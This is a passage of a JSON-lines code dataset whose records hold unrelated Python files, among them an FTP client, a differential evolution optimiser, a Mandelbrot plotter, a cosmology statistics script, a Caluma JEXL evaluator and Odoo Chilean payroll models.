self.client.recv(1024)\n received_size += len(data)\n received_data += data\n else:\n print(\"当前FTP目录:{},其内容为:\".format(dirname))\n print(received_data.decode())\n def cmd_lls(self,*args):\n '''查看本地下载目录的内容。'''\n local_file_dir = settings.ACCOUNT_BASE['file_dir']\n\n if os.name == 'nt':\n cmd_res = \" \".join(os.listdir(local_file_dir))\n else:\n cmd_res = os.popen('ls'+' '+local_file_dir+'-l').read()\n print('本地目录:{},的内容为:'.format(local_file_dir))\n print(cmd_res)\n\n\n def cmd_cd(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n if cmd_split[1]=='..':\n list_dir_name=user_data['current_dir'].split('/')\n if len(list_dir_name)>1:\n list_dir_name.pop()\n if len(list_dir_name)==1:\n dirname =list_dir_name[0]\n else:\n dirname=\"/\".join(list_dir_name)\n else:\n print('这个没有父目录。')\n dirname = user_data['current_dir']\n elif cmd_split[1].isalnum():\n dirname = user_data['current_dir'] + '/' + cmd_split[1]\n else:\n dirname = user_data['current_dir']\n\n else:\n dirname = user_data['current_dir']\n\n msg_dic = {\n \"action\": \"cd\",\n \"dirname\": dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res = self.client.recv(1024)\n cmd_dic=json.loads(cmd_res.decode())\n if cmd_dic['res_type']==0:\n user_data['current_dir']=dirname\n print(\"当前目录为:{}\".format(dirname))\n else:\n print(\"目录不存在:{}\".format(dirname))\n def cmd_pwd(self,*args):\n cmd_split = args[0].split()\n if cmd_split[0]=='pwd':\n print('当前目录为:/{}/'.format(user_data['current_dir']))\n\n\n def cmd_mkdir(self,*args):\n cmd_split = args[0].split()\n\n if len(cmd_split) > 1:\n\n if cmd_split[1].isalnum():\n dirname = user_data['current_dir']+'/'+cmd_split[1]\n msg_dic = {\n \"action\": \"mkdir\",\n \"dirname\": dirname\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n print(\"send\", json.dumps(msg_dic).encode(\"utf-8\"))\n cmd_res = self.client.recv(1024)\n res_dic=json.loads(cmd_res.decode())\n if res_dic['res_type'] == 0:\n print(\"目录创建成功:{}\".format(res_dic['res_data']))\n else:\n print(\"创建失败:{}\".format(res_dic['res_data']))\n else:\n print(\"输入的目录名称有误,不支持特殊字符。\")\n else:\n print(\"不能创建一个空目录。\")\n pass\n\n\n def cmd_bye(self,*args):\n self.client.shutdown(1)\n exit(\"Goodbye!\")\n\n\n\n\n def cmd_put(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) >1:\n filename = cmd_split[1]\n abs_filename=settings.ACCOUNT_BASE['file_dir']+'/'+filename\n current_dir=user_data['current_dir']\n\n if os.path.isfile(abs_filename):\n filesize = os.stat(abs_filename).st_size\n msg_dic = {\n \"action\": \"put\",\n \"filename\":filename,\n \"size\": filesize,\n \"overridden\":True,\n \"current_dir\":current_dir\n }\n self.client.send( json.dumps(msg_dic).encode(\"utf-8\") )\n print(\"send file size\",filesize )\n #防止粘包,等服务器确认\n server_response = self.client.recv(1024)\n res_dic=json.loads(server_response.decode())\n if res_dic['res_type']==0:\n f = open(abs_filename,\"rb\")\n m = hashlib.md5()\n for line in f:\n m.update(line)\n self.client.send(line)\n\n\n else:\n\n print(\"file md5\", m.hexdigest())\n self.client.send(m.hexdigest().encode()) # send md5\n f.close()\n print(\"文件上传成功...\")\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n if res_dic['res_type'] == 0:\n print(res_dic['res_data'])\n else:\n print(res_dic['res_data'])\n else:\n print(res_dic['res_data'])\n\n else:\n print(filename,\"is not exist\")\n def cmd_get(self,*args):\n cmd_split = args[0].split()\n if len(cmd_split) > 1:\n filename = cmd_split[1]\n abs_file_dir=settings.ACCOUNT_BASE['file_dir']\n self.abs_filename = settings.ACCOUNT_BASE['file_dir'] + '/' + filename\n if os.path.isfile(self.abs_filename):\n print(\"文件:{},在本地目录已经存在。\".format(self.abs_filename))\n\n else:\n msg_dic = {\n \"action\": \"get\",\n \"filename\": filename,\n \"size\": None,\n \"current_dir\": user_data['current_dir']\n }\n self.client.send(json.dumps(msg_dic).encode(\"utf-8\"))\n\n # 等服务器发送文件大小过来。\n\n\n server_response = self.client.recv(1024)\n res_dic = json.loads(server_response.decode())\n if res_dic['res_type']==0:\n self.file_total_size=res_dic['res_data']\n print(\"返回文件的大小:{}\".format(self.file_total_size) )\n self.client.send(\"准备好了,发吧。\".encode(\"utf-8\"))\n received_size = 0\n received_data = b''\n f = open(self.abs_filename, \"wb\")\n event.set()\n start_time=time.time()\n\n while received_size < self.file_total_size:\n if self.file_total_size - received_size > 1024:\n size = 1024\n else:\n size = self.file_total_size - received_size\n data = self.client.recv(size)\n received_size += len(data)\n\n f.write(data)\n\n else:\n event.clear()\n f.close()\n m = hashlib.md5()\n with open(self.abs_filename,'rb') as f2:\n m.update(f2.read())\n new_file_md5 = m.hexdigest()\n print(\"file recv done\")\n print(\"耗时:{}s\".format(time.time()-start_time))\n\n server_file_md5 = self.client.recv(1024)\n print(\"server file md5:\", server_file_md5.decode())\n print(\"client file md5:\", new_file_md5)\n if server_file_md5.decode() == new_file_md5:\n print(\"MD5校验码一致。\")\n else:\n print(\"MD5校验码不一致。\")\n else:\n print(res_dic['res_data'])\n\n def downprogress(self, *args):\n while True:\n if event.is_set():\n print(\"文件创建了,开始准备进度条。\")\n self.filename = self.abs_filename\n self.file_size = 0\n self.file_total = self.file_total_size\n while self.file_size < self.file_total: # 获取当前下载进度\n time.sleep(1)\n if os.path.exists(self.filename):\n self.down_rate = (os.path.getsize(self.filename) - self.file_size) / 1024 / 1024\n self.down_time = (self.file_total - self.file_size) / 1024 / 1024 / self.down_rate\n # print(\" \" + str('%.2f' % self.down_rate + \"MB/s\"), end=\"\")\n self.file_size = os.path.getsize(self.filename)\n # print(\"\\r \" + str(int(self.down_time)) + \"s\",\" \" + str('%.2f' % (self.file_size / 1024 / 1024)) + \"MB\", end=\"\")\n # print(\" \" + str('%.2f' % (self.file_size / 1024 / 1024)) + \"MB\", end=\"\")\n view_bar(self.file_size, self.file_total)\n else:\n event.wait()\n\n\nftp = FtpClient()\nftp.connect(\"localhost\",9999)\nevent = threading.Event()\n# ftp.connect(\"192.168.88.128\",9999)\nf1 = threading.Thread(target=ftp.interactive,)\n\nf1.start()\nftp.downprogress()","sub_path":"ftp_client/core/down_load_progress.py","file_name":"down_load_progress.py","file_ext":"py","file_size_in_byte":12799,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"50013556","text":"import numpy as np\n\n\ndef objective_function(x):\n sum = 0\n for i in range(len(x)):\n sum += x[i]**2\n return sum / len(x)\n\n\nbounds = [(-5, 5)] * 5\n\n\ndef differential_evolution(objective_function, bounds, max_gen=100, mutation_factor=0.8,\n crossover_probability=0.7, population_size=10):\n \"\"\"\n differential evolution program to minimize a function\n \"\"\"\n\n dimension = 5\n population = np.random.rand(population_size, dimension)\n lower_bound, upper_bound = np.asarray(bounds).T\n difference = np.fabs(lower_bound - upper_bound)\n initial_population = lower_bound + population * difference\n print(\"initial pop: \", initial_population)\n fitness = np.asarray([objective_function(ind) for ind in initial_population])\n print(\"fitness : \", fitness)\n best_index = np.argmin(fitness)\n best = initial_population[best_index]\n print(\"best : \", best)\n for i in range(max_gen):\n for j in range(population_size):\n indices = [index for index in range(population_size) if index != j]\n\n x0, x1, x2 = population[np.random.choice(indices, 3, replace=False)]\n \n mutant_vector = np.clip(x0 + mutation_factor * (x1 - x2), 0, 1)\n \n crossover = np.random.rand(dimension) < crossover_probability\n\n if not np.any(crossover):\n crossover[np.random.randint(0, dimension)] = True\n\n trial_vector = np.where(crossover, mutant_vector, population[j])\n \n new_population = lower_bound + trial_vector * difference\n\n new_fitness = objective_function(new_population)\n\n # print(\"\\nnew fitness : \", new_fitness)\n # print(\"fitness[\", j, \"]\", fitness[j])\n\n # print(\"new_fitness.all() < fitness[j].all() :\", new_fitness < fitness[j])\n\n if new_fitness < fitness[j]:\n fitness[j] = new_fitness\n population[j] = trial_vector\n if new_fitness < fitness[best_index]:\n best_index = j\n best = new_population\n yield best, fitness[best_index]\n\n\nprint(differential_evolution.__doc__)\nfor best, fitness in differential_evolution(objective_function, bounds):\n print(\"best = \", best, \"fitness = \", fitness)\n\n","sub_path":"differentialEvol.py","file_name":"differentialEvol.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"525761608","text":"import sys\n\nfrom graphics import *\nRadius = 30\nCx = 0.5 #0.7454294\nCy = 0.0\nSide = 1.3 #1.7 \nM = 300\nN = 1\nNum = 256*N\nsT=5\nw = 0\n# x = 0.0\n# y = 0.0\n\nimport random\np = M/2+random.randrange(-M/2,M/2)\nq = M/2+random.randrange(-M/2,M/2)\n\nwin = GraphWin(\"Mandelbrot\", int(5*M/3),int(5*M/3))\n\n\ndef rectCol(p,q,w):\n Rect = Rectangle(Point(int(p-sT/2),int(q-sT/2)), \n Point(int(p+sT/2),int(q+sT/2))) \n Rect.draw(win).setFill(color_rgb(int(10*w%255), \n int((128-10*w)%255),int((128+10*w)%255)))\n\ni = 1\nwhile i > 0:\n p = p+random.randrange(-1,2)*sT\n q = q+random.randrange(-1,2)*sT\n if p < 0:\n p = p+2\n elif p > M:\n p = p-2\n \n if q < 0:\n q = q+2\n elif q > M:\n q = q-2\n Incx = Cx - Side + 2 * Side/M*q#-Side + 2*Side/M*q\n Incy= Cy - Side + 2 *Side/ M*p #- Side + 2*Side/M*p\n x = 0.0#Incx\n y = 0.0#Incy\n w=0\n for n in range(1,Num):\n xx = x*x - y*y - Incx# Cx\n yy = 2*x*y - Incy#Cy\n x = xx\n y = yy\n if x*x + y*y > Radius:\n w = n/N\n rectCol(int(M/3+q),int(M/3+p),int(w))\n break\nwin.getMouse()\nwin.close()\n","sub_path":"Cellular Automata.py","file_name":"Cellular Automata.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"647349083","text":"#!/usr/bin/env python3\nimport numpy as np\nfrom getdist import loadMCSamples\nimport sys, os\n\nif len(sys.argv) != 3:\n print('Usage: {} FILE_ROOT CAT_TYPE'.format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n# Getting catalog type\ncat_type = sys.argv[2]\n\n# Setting parameter names and ranges\nif cat_type == 'void':\n npar = 4\n names = ['alpha', 'B', 'Snl', 'c']\n labels = [r'$\\alpha$', r'$B$', r'$\\Sigma_{\\rm nl}$', r'$c$']\nelif cat_type=='gal':\n npar = 3\n names = ['alpha', 'B', 'Snl']\n labels = [r'$\\alpha$', r'$B$', r'$\\Sigma_{\\rm nl}$']\nelse:\n sys.exit('ERROR:\\tCatalog type not understood.\\nCAT_TYPE=void, gal\\n')\n\nlowbound = ['N'] * npar\nupbound = ['N'] * npar\n\n# I/O files\nfileroot = sys.argv[1]\npath, name = os.path.split(fileroot)\nif path == '':\n fileroot = './' + fileroot\nchains = fileroot + '.txt'\nfparam = fileroot + '.paramnames'\nfrange = fileroot + '.ranges'\nofile = fileroot + 'mystats.txt'\nif not os.path.isfile(chains):\n print('Error: cannot access {}'.format(chains), file=sys.stderr)\n sys.exit(1)\n\nnp.savetxt(fparam, np.transpose([names, labels]), fmt='%s')\nnp.savetxt(frange, np.transpose([names, lowbound, upbound]), fmt='%s')\n\n# Load sample from FILE_ROOT.txt\nsample = loadMCSamples(fileroot, \\\n settings={'fine_bins_2D':1024,'fine_bins':8192})\n\nstats = sample.getMargeStats()\npar = stats.parWithName(names[0])\nlower = par.limits[0].lower\nupper = par.limits[0].upper\nsigma = (upper - lower) * 0.5\nbest = (upper + lower) * 0.5\n\n# Read evidence from FILE_ROOTstats.dat\nfstat = fileroot + 'stats.dat'\nwith open(fstat, \"r\") as f:\n f.readline()\n line = f.readline()\n evi = float(line.split(':')[1].split()[0])\n\nwith open(ofile, \"w\") as f:\n f.write('{0:.5f} {1:.6f} {2:.6f}'.format(best, sigma, evi))\n\n","sub_path":"src/baofit/stats_center.py","file_name":"stats_center.py","file_ext":"py","file_size_in_byte":1734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"123357004","text":"from agent.check_plugins.ping import Ping\r\nimport asyncio\r\nimport aiohttp\r\nimport unittest\r\nimport json\r\n\r\n\r\nclass TestPingPlugin(unittest.TestCase):\r\n def setUp(self):\r\n self.loop = asyncio.new_event_loop()\r\n asyncio.set_event_loop(None)\r\n\r\n def tearDown(self):\r\n self.loop.stop()\r\n self.loop.run_forever()\r\n self.loop.close()\r\n\r\n def test_get_result(self):\r\n\r\n @asyncio.coroutine\r\n def go():\r\n queue = asyncio.Queue(loop=self.loop)\r\n ping = Ping(self.loop, queue)\r\n with aiohttp.ClientSession(loop=self.loop) as client:\r\n yield from ping(client, 'http://httpbin.org/get')\r\n cor_result = yield from queue.get()\r\n result = yield from cor_result\r\n result = json.loads(result)\r\n self.assertIsInstance(result, dict)\r\n self.assertEqual(result['url'], 'http://httpbin.org/get')\r\n\r\n self.loop.run_until_complete(go())","sub_path":"tests/test_ping_plugin.py","file_name":"test_ping_plugin.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"86959123","text":"import numpy as np\nfrom numpy import linalg\nfrom scipy.stats import ncx2\nimport math\nimport statistics\nimport Question1\n\n\ndef question2():\n k = 0.92\n r0 = 0.05\n sigma = 0.12\n ravg = 0.055\n np.random.seed(1234)\n\n #a\n expiry = 0.5\n strike = 980\n no_of_sim = 250\n time = 1\n step_size = 1/252\n fv = 1000\n\n #With explicit for underlying\n price_call_dis_bond_2 = price_call_discount_bond(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike)\n\n #With monte carlo for underlying\n price_call_dis_bond = price_call_discount_bond_mc(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry,strike)\n print(\"The discount bond call price is {0:.4f}\".format(price_call_dis_bond))\n\n #b\n step_size = 1/365\n dx = 0.001\n price_implicit = calculate_price_implicit(sigma,dx, step_size, r0, time, strike, k, ravg, fv, expiry)\n print(\"The discount bond call price using implicit method is {0:.4f}\".format(price_implicit))\n\n #c\n explicit_price = price_call_explicit(r0, expiry, time, k, sigma, ravg, strike, fv)\n print(\"The explicit price of the discount bond call is {0:.4f}\".format(explicit_price))\n\ndef price_call_discount_bond_mc(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike):\n no_of_steps = int(expiry/step_size)\n call_prices = [None]*no_of_sim\n for simCount in range(1,no_of_sim+1):\n randoms = np.random.normal(0,1,no_of_steps)\n r_path = build_r_path(r0, no_of_steps, k, ravg, step_size, sigma, randoms)\n price = Question1.price_discount_bond(r_path[no_of_steps-1], sigma, k, ravg, fv, time-expiry, 2*(time-expiry)/no_of_steps,\n no_of_sim)\n call_prices[simCount-1] = math.exp(-sum(r_path) * step_size)*max(price-strike,0.0)\n\n return statistics.mean(call_prices)\n\ndef price_call_discount_bond(r0, sigma, k, ravg, fv, time, step_size, no_of_sim, expiry, strike):\n no_of_steps = int(expiry/step_size)\n call_prices = [None]*no_of_sim\n for simCount in range(1,no_of_sim+1):\n randoms = np.random.normal(0,1,no_of_steps)\n r_path = build_r_path(r0, no_of_steps, k, ravg, step_size, sigma, randoms)\n price = Question1.price_discount_bond_explicit(r_path[no_of_steps-1], sigma, k, ravg, expiry, time, fv)\n call_prices[simCount-1] = math.exp(-sum(r_path) * step_size)*max(price-strike,0.0)\n\n return statistics.mean(call_prices)\n\n\ndef calculate_price_implicit(sigma,dx, step_size, r0, time, strike, k, ravg, fv, expiry):\n\n no_of_paths = int(r0/dx)\n\n # Generate rates and calculate terminal prices\n rate_path = [r0 + dx*count for count in range(no_of_paths, -no_of_paths - 1, -1)]\n\n #prices_ter = [max(Question1.price_discount_bond_explicit(rate, sigma, k, ravg, expiry, time, fv) - strike, 0.0)\n # for rate in rate_path]\n prices_ter = [max(Question1.price_discount_bond(rate, sigma, k, ravg, fv, (time-expiry), 1/252, 1000) - strike, 0.0)\n for rate in rate_path]\n\n # Generate call Prices\n max_time_steps = int(expiry / step_size)\n call_prices = np.full([2 * no_of_paths + 1, max_time_steps], np.nan)\n call_prices[:, (max_time_steps - 1)] = prices_ter\n\n # Calculate price at every time\n for count in range(max_time_steps - 2, -1, -1):\n call_prices[:, count] = calculate_IFD(no_of_paths, call_prices[:, count + 1], rate_path, step_size,\n sigma, dx, ravg, k)\n\n return call_prices[no_of_paths,0]\n\n\ndef calculate_ps(dt, sigma, dx, r, ravg, k):\n pu = -0.5 * dt * (((sigma ** 2) * r / (dx ** 2)) + ((k * (ravg - r)) / dx))\n pm = 1 + dt * ((sigma ** 2)* r / dx ** 2) + r * dt\n pd = -0.5 * dt * (((sigma ** 2) * r / (dx ** 2)) - ((k * (ravg - r)) / dx))\n\n return [pu, pm, pd]\n\ndef build_r_path(r0, no_of_steps, k, ravg, step_size, sigma, randoms):\n r_path = [None] * (no_of_steps + 1)\n r_path[0] = r0\n\n for count in range(1, no_of_steps + 1):\n dr = k * (ravg - abs(r_path[count - 1])) * step_size + sigma * math.sqrt(step_size) \\\n * math.sqrt(abs(r_path[count - 1])) * randoms[count - 1]\n r_path[count] = abs(r_path[count-1]) + dr\n return r_path\n\ndef calculate_IFD(no_of_paths, call_prices_next, r_path, step_size, sigma, dx, ravg, k):\n mat_a = np.zeros([2 * no_of_paths + 1, 2 * no_of_paths + 1])\n mat_a[0, 0] = 1\n mat_a[0, 1] = -1\n\n for count in range(1, 2 * no_of_paths):\n ps = calculate_ps(step_size, sigma, dx, r_path[count], ravg, k)\n mat_a[count, count - 1] = ps[0]\n mat_a[count, count] = ps[1]\n mat_a[count, count + 1] = ps[2]\n\n mat_a[2 * no_of_paths, 2 * no_of_paths - 1] = 1\n mat_a[2 * no_of_paths, 2 * no_of_paths] = -1\n\n mat_b = np.zeros([2 * no_of_paths + 1, 1])\n mat_b[1:(2 * no_of_paths - 1), 0] = call_prices_next[1:(2 * no_of_paths - 1)]\n mat_b[0, 0] = r_path[0] - r_path[1]\n\n mat_f = np.dot(linalg.inv(mat_a), mat_b)\n return mat_f[:, 0]\n\n\ndef price_call_explicit(r0, expiry, time, k, sigma, ravg, strike, fv):\n ab = calculate_a_b(expiry, time, k, sigma, ravg)\n\n r_star = math.log(ab[0]/(strike/fv)) / ab[1]\n theta = math.sqrt(k**2 + (2 * (sigma**2)))\n phi = 2*theta/((sigma**2)*(math.exp(theta * expiry)-1))\n psi = (k + theta)/(sigma ** 2)\n price_1 = price_bond_explicit(r0, time, k, sigma, ravg)\n price_2 = price_bond_explicit(r0, expiry, k, sigma, ravg)\n\n chi2_1 = chisq(2*r_star*(phi+psi+ab[1]),4*k*ravg/(sigma**2),\n (2 * (phi**2) * r0 * math.exp(theta*expiry))/(phi + psi + ab[1]))\n\n chi2_2 = chisq(2*r_star*(phi+psi),4*k*ravg/(sigma**2),\n (2 * (phi**2) * r0 * math.exp(theta*expiry))/(phi + psi))\n\n call_price = (fv * price_1 * chi2_1) - (strike * price_2 * chi2_2)\n\n return call_price\n\ndef price_bond_explicit(rt, time, k, sigma, ravg):\n ab = calculate_a_b(0, time, k, sigma, ravg)\n return ab[0] * math.exp(-ab[1]*rt)\n\ndef calculate_a_b(expiry, time, k , sigma, ravg):\n h1 = math.sqrt(k ** 2 + 2 * (sigma ** 2))\n h2 = (k + h1) / 2\n h3 = (2 * k * ravg) / (sigma ** 2)\n\n nmtr_b = math.exp(h1 * (time-expiry)) - 1\n dmtr_b = h2 * (math.exp(h1 * (time-expiry)) - 1) + h1\n\n b = nmtr_b/dmtr_b\n\n nmtr_a = h1 * math.exp(h2 * (time-expiry))\n dmtr_a = h2 * (math.exp(h1 * (time-expiry)) - 1) + h1\n\n a = (nmtr_a/dmtr_a) ** h3\n\n return [a,b]\n\ndef chisq(x, p, q):\n return ncx2.cdf(x, p, q)\n\n","sub_path":"237G_Computational/Projects/Project8/Python_backup/Question2.py","file_name":"Question2.py","file_ext":"py","file_size_in_byte":6508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"376271045","text":"\nimport json\n\n\ndef concateName(nameList):\n\tr = ''\n\tfor name in nameList:\n\t\tname = name.replace(\",\", \" \")\n\t\tr = r + ' ' + name.strip()\n\treturn r.strip()\n\t\t\t\n\t\nif __name__ == '__main__':\n\twith open('data.json', 'r') as f:\n\t\tdata = json.load(f)\n\n\tnewData = list()\n\tfor d in data:\n\t\tname = d['company']['name']\n\t\tif type(name) == list:\n\t\t\tname = concateName(name)\n\t\tnewData.append((name, d['job_title'], d['week_work_time']))\n\t\n\tnewData.sort(reverse=True, key=lambda x:x[2])\n\t\n\tfor d in newData:\n\t\tprint('%s, %s, %d' % (d[0], d[1], d[2]))\n\t\t","sub_path":"statByTime.py","file_name":"statByTime.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"30855602","text":"class ListNode:\n def __init__(self, x, nxt=None):\n self.val = x\n self.next = nxt\n\nclass LinkedList:\n def __init__(self):\n self.h = None\n self.t = None\n\n def __add__(self, other):\n self.t.next = other\n return self.h\n\n def append(self, x):\n if not self.h:\n self.h = x\n self.t = x\n else:\n self.t.next = x\n self.t = x\n\ndef traverse(head):\n if head:\n p = head\n print(p.val)\n while p.next:\n p = p.next\n print(p.val)\n print('--- end traversing ---')\n\ndef merge(list0, list1):\n p0 = list0\n p1 = list1\n mer = LinkedList()\n while p0 and p1:\n if p0.val > p1.val:\n mer.append(ListNode(p1.val))\n p1 = p1.next\n else:\n mer.append(ListNode(p0.val))\n p0 = p0.next\n\n if p0:\n mer += p0 # 这里返回self.h, mer类型被重置为 ListNode\n if p1:\n mer += p1\n return mer\n\nh0 = ListNode(2, ListNode(5, ListNode(7, ListNode(10, ListNode(17)))))\nh1 = ListNode(4, ListNode(5, ListNode(6)))\nh = merge(h0, h1)\nprint(type(h))\ntraverse(h)","sub_path":"剑指offer/016-合并有序链表/mergeOrd.py","file_name":"mergeOrd.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"74091452","text":"#!/usr/bin/env python3\n\nfrom main_window import MainWindow\nfrom PyQt5.QtWidgets import QApplication\n\ndef main():\n\t\"\"\"\n\tThe main function, runs when the script is called from the command line\n\n\t\"\"\"\n\t# Handler for the event loop\n\tapplication = QApplication([])\n\n\t# Makes an instance of the MainWindow class\n\tmainWindow = MainWindow()\n\t# Calls MainWindow method .show()\n\tmainWindow.show()\n\n\t# .exec begins the while loop for the event loop, does not exit until receives\n\t# user input\n\texit(application.exec())\n\n\n\n\n\n\n\nif (__name__ == '__main__'):\n\tmain()","sub_path":"adventure_threadsignal/character_select_window.py","file_name":"character_select_window.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"47724767","text":"from pyjexl.analysis import ValidatingAnalyzer\n\nfrom ..core.jexl import JEXL\n\n\nclass QuestionValidatingAnalyzer(ValidatingAnalyzer):\n def visit_Transform(self, transform):\n if transform.name == \"answer\" and not isinstance(transform.subject.value, str):\n yield f\"{transform.subject.value} is not a valid question slug.\"\n\n yield from super().visit_Transform(transform)\n\n\nclass QuestionJexl(JEXL):\n def __init__(self, answer_by_question={}, **kwargs):\n super().__init__(**kwargs)\n\n self.context = answer_by_question\n self.add_transform(\"answer\", self.answer_transform)\n self.add_transform(\"mapby\", lambda arr, key: [obj[key] for obj in arr])\n self.add_binary_operator(\n \"intersects\", 20, lambda left, right: any(x in right for x in left)\n )\n\n def answer_transform(self, question_with_path):\n current_context = self.context\n segments = question_with_path.split(\".\")\n\n # Allow question paths to originate from the toplevel (root) document\n if segments[0] == \"root\":\n while \"parent\" in current_context:\n current_context = current_context[\"parent\"]\n segments = segments[1:]\n\n try:\n for segment in segments:\n current_context = current_context[segment]\n return current_context\n except KeyError:\n explanation = \"\"\n if len(segments) > 1:\n explanation = f\" (failed at segment '{segment}')\"\n\n available_keys = \", \".join(current_context.keys())\n raise RuntimeError(\n f\"Question could not be resolved: {question_with_path}{explanation}. Available: {available_keys}\"\n )\n\n def validate(self, expression):\n return super().validate(expression, QuestionValidatingAnalyzer)\n","sub_path":"caluma/form/jexl.py","file_name":"jexl.py","file_ext":"py","file_size_in_byte":1851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"287035","text":"from pytz import timezone\nfrom datetime import date, datetime, time\n\nfrom odoo import api, fields, models, tools, _\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.exceptions import UserError, ValidationError\n\n\nclass HrPayslip(models.Model):\n _inherit = 'hr.payslip'\n _description = 'Pay Slip'\n \n indicadores_id = fields.Many2one('hr.indicadores', string='Indicadores',\n readonly=True, states={'draft': [('readonly', False)]},\n help='Defines Previred Forecast Indicators')\n movimientos_personal = fields.Selection((('0', 'Sin Movimiento en el Mes'),\n ('1', 'Contratación a plazo indefinido'),\n ('2', 'Retiro'),\n ('3', 'Subsidios (L Médicas)'),\n ('4', 'Permiso Sin Goce de Sueldos'),\n ('5', 'Incorporación en el Lugar de Trabajo'),\n ('6', 'Accidentes del Trabajo'),\n ('7', 'Contratación a plazo fijo'),\n ('8', 'Cambio Contrato plazo fijo a plazo indefinido'),\n ('11', 'Otros Movimientos (Ausentismos)'),\n ('12', 'Reliquidación, Premio, Bono') \n ), 'Código Movimiento', default=\"0\")\n\n date_start_mp = fields.Date('Fecha Inicio MP', help=\"Fecha de inicio del movimiento de personal\")\n date_end_mp = fields.Date('Fecha Fin MP', help=\"Fecha del fin del movimiento de personal\")\n\n @api.model\n def create(self, vals):\n if 'indicadores_id' in self.env.context:\n vals['indicadores_id'] = self.env.context.get('indicadores_id')\n if 'movimientos_personal' in self.env.context:\n vals['movimientos_personal'] = self.env.context.get('movimientos_personal')\n return super(HrPayslip, self).create(vals)\n\n @api.model\n def get_worked_day_lines(self, contracts, date_from, date_to):\n res = super(HrPayslip, self).get_worked_day_lines(contracts, date_from, date_to)\n temp = 0 \n dias = 0\n attendances = {}\n leaves = []\n for line in res:\n if line.get('code') == 'WORK100':\n attendances = line\n else:\n leaves.append(line)\n for leave in leaves:\n temp += leave.get('number_of_days') or 0\n #Dias laborados reales para calcular la semana corrida\n effective = attendances.copy()\n effective.update({\n 'name': _(\"Dias de trabajo efectivos\"),\n 'sequence': 2,\n 'code': 'EFF100',\n })\n # En el caso de que se trabajen menos de 5 días tomaremos los dias trabajados en los demás casos 30 días - las faltas\n # Estos casos siempre se podrán modificar manualmente directamente en la nomina.\n # Originalmente este dato se toma dependiendo de los dias del mes y no de 30 dias\n # TODO debemos saltar las vacaciones, es decir, las vacaciones no descuentan dias de trabajo. \n if (effective.get('number_of_days') or 0) < 5:\n dias = effective.get('number_of_days')\n else:\n dias = 30 - temp\n attendances['number_of_days'] = dias\n res = []\n res.append(attendances)\n res.append(effective)\n res.extend(leaves)\n return res\n\n\nclass HrRuleInput(models.Model):\n _name = 'hr.rule.input'\n _description = 'Salary Rule Input'\n\n name = fields.Char(string='Descripcion', required=True)\n code = fields.Char(required=True, help=\"The code that can be used in the salary rules\")\n input_id = fields.Many2one('hr.salary.rule', string='Salary Rule Input', required=True)\n\n\nclass HrPayslipLine(models.Model):\n _inherit = 'hr.payslip.line'\n\n register_id = fields.Many2one('hr.contribution.register', string='Registro de contribución',\n help=\"Eventual third party involved in the salary payment of the employees.\")\n\n\nclass HrPayslipEmployees(models.TransientModel):\n _inherit = 'hr.payslip.employees'\n\n\n def compute_sheet(self):\n indicadores_id = False\n if self.env.context.get('active_id'):\n indicadores_id = self.env['hr.payslip.run'].browse(self.env.context.get('active_id')).indicadores_id.id\n return super(HrPayslipEmployees, self.with_context(indicadores_id=indicadores_id)).compute_sheet()\n\nfrom odoo import api, fields, models, tools, _\n\n\nclass HrPayslipRun(models.Model):\n _inherit = 'hr.payslip.run'\n _description = 'Payslip Run'\n\n indicadores_id = fields.Many2one('hr.indicadores', 'Indicadores', states={'draft': [('readonly', False)]}, readonly=True, required=True)\n movimientos_personal = fields.Selection((('0', 'Sin Movimiento en el Mes'),\n ('1', 'Contratación a plazo indefinido'),\n ('2', 'Retiro'),\n ('3', 'Subsidios (L Médicas)'),\n ('4', 'Permiso Sin Goce de Sueldos'),\n ('5', 'Incorporación en el Lugar de Trabajo'),\n ('6', 'Accidentes del Trabajo'),\n ('7', 'Contratación a plazo fijo'),\n ('8', 'Cambio Contrato plazo fijo a plazo indefinido'),\n ('11', 'Otros Movimientos (Ausentismos)'),\n ('12', 'Reliquidación, Premio, Bono') \n ), 'Movimientos Personal', default=\"0\")","sub_path":"opens_hr/models/hr_payslip.py","file_name":"hr_payslip.py","file_ext":"py","file_size_in_byte":5016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"212621472","text":"import sys\nimport pygame\nimport time\n\npygame.init()\nwin = pygame.display.set_mode((1200, 800))\n\n\ngreen = (0, 200, 0)\nwhite = (255, 255, 255)\n\ndef loadimages():\n image1 = pygame.image.load(\"drum.png\")\n win.blit(image1, (200, 100))\n image2 = pygame.image.load(\"guitarlogo.jpg\")\n win.blit(image2, (500, 100))\n image3 = pygame.image.load(\"cymbals.jpg\")\n win.blit(image3, (800, 